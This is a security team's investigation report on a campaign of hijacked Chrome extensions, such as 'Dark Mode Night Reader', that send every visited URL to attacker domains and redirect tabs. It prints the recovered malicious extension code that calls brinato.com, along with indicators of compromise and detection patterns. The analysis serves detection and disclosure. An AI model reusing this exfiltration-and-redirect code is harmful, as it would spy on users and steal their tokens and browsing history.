Uncovering a Mass-Hijack Chrome Extension Campaign

Executive Summary

A while ago, our SOC team intercepted a suspicious Zscaler alert indicating one of our users’ browsers was leaking internal Okta URLs to an external domain.
A deeper dive revealed a cluster of malicious Chrome extensions, collectively installed by millions of users, designed to exfiltrate browsing history and redirect victims to attacker-controlled sites.

This post outlines our detection, investigation steps, key findings, IOCs, and recommended mitigations.

1. Background & Detection

As with any Okta-enjoying organization, we have always focused on detecting Okta-related social engineering campaigns.
Some time ago, we implemented a simple detection for Evilginx and similar tools by alerting whenever a user visited an external domain with our Okta domain appearing in any URL parameter.
This rule has successfully caught phishing attempts in the past. However, one week ago it began triggering on apparently benign URL visits.

We observed a user visiting several hundred URLs resembling:

    https://brinato.com/api?key=REDACTED&allowempty=1&out=https://our-domain.okta.com/

After confirming there was no active phishing campaign, we grew concerned about how this traffic was being generated—exfiltrating internal URLs and sensitive parameters (API keys, session tokens, etc.).

Unable to determine the cause remotely, we suspected the laptop itself might be compromised and initiated a forensic investigation.

2. Forensic Investigation

Endpoint Logs

Traced hundreds of requests from the user’s machine to brinato.com, each including an out= parameter pointing to internal application URLs (tokens, API keys, etc.).

Chrome Extension Audit

Identified a popular 2 M+ install extension—Dark Mode Night Reader—installed and active on the endpoint.

'Dark Mode Night Reader' (Google-Featured Extension)

At the time of our investigation, this extension had over 2 M installs, a 4.2-star rating from 491 reviews, and was Google-verified.

We discovered two versions on the laptop: an older release without malicious references, and a newer release that included calls to brinato.com.
This suggested the extension was likely hijacked or sold to malicious actors via black-market sites (e.g., Flippa).

Code Analysis

Unpacked the CRX and located the following core logic:

    chrome.tabs.onUpdated.addListener(async (tabId, changeInfo, tab) => {
        if (changeInfo.url) {
            const resp = await bt.get("https://brinato.com/api", {
                params: {
                    key: "1320db5f3f9cf8529b89fb8c546fe48324a20f05",
                    allowempty: 1,
                    out: changeInfo.url,
                    format: "txt",
                    r: Math.random(),
                },
                method: "POST",
                redirect: "follow",
                responseType: "text",
            })
            .then(r => r.data.match(/^http/i) && r.data)
            .catch(() => false);

            if (resp && resp.match(/^http/i)) {
                chrome.tabs.update(tabId, { url: resp });
            }
        }
    });

Malicious Code Features

• Exfiltration: Subscribes to chrome.tabs.onUpdated and sends each visited URL to the attacker.
• Redirect: If the attacker returns a URL, the user is silently redirected.

3. Broader Investigation

This single compromised extension suggested a wider problem in the Chrome Web Store.
We created a SIEM rule to alert on any URL containing &allowempty=1&out= and discovered additional compromised users running different malicious extensions.

Mass-Scale Scan

I downloaded and scanned the top 50,000 most popular Chrome extensions for references to &allowempty=1&out=, hardcoded 40-character API keys, and chrome.tabs.onUpdated.addListener.
After scanning approximately 1 TB of extension files (which caused an external M.2 SSD to overheat), I identified eight malicious extensions using the same hijacking technique, each communicating with different attacker-controlled domains but sharing the same code patterns.

4. Malicious Extensions Overview

Many of these extensions had already been removed by the time of discovery; however, several remained live on the store.

Utility-Style Extensions

VPN-Style Extensions

5. Impact & Attribution

• Scale: Over 10 million combined installs before removal.
• Data Exposure: All browsing history was exfiltrated in clear text to the attacker; it is unknown whether any users were redirected.
• Redirect Capability: Silent steering to phishing or malware sites.
• Attribution: No link to a known threat actor; likely a commodity attack kit traded on extension black markets.

6. Indicators of Compromise (IOCs)

Malicious Domains & APIs

    brinato.com  
    admitclick.net  
    addmitab.com  
    getadtad.com  
    ytskip.com  
    click.videocontrols.com  
    untwitter.com  
    undiscord.com  
    unyoutube.com  

Code Patterns

    - `chrome.tabs.onUpdated.addListener(async (tabId, changeInfo, tab) => { … })`  
    - HTTP POST to `*.com/api` with `params.out = changeInfo.url`  
    - Redirect logic: `chrome.tabs.update(tabId, { url: resp })`

Extension IDs

    eokjikchkppnkdipbiggnmlkahcdkikp  
    pdpfhanekfkeijhemmfbnnjffiblgefi  
    lkahpjghmdhpiojknppmlenngmpkkfma  
    cbajickflblmpjodnjoldpiicfmecmif  
    mlgbkfnjdmaoldgagamcnommbbnhfnhf  
    pdbfcnhlobhoahcamoefbfodpmklgmjm  
    gaiceihehajjahakcglkhmdbbdclbnlf  
    pjbgfifennfhnbkhoidkdchbflppjncb  

7. Conclusion

This campaign demonstrates a new browser-based supply chain attack: weaponizing popular extensions to harvest history, exfiltrate secrets, and redirect victims.
I don't remember reading about such a large-scale extension hijack. I believe this attack vector will continue to become more popular in the future.

Recommendations:

• Do not trust extensions based solely on popularity or a verified badge.
• Enforce company-wide extension whitelists via group policy or MDM.
• Proactively hunt for similar indicators in enterprise telemetry.

Thank you, have a nice day.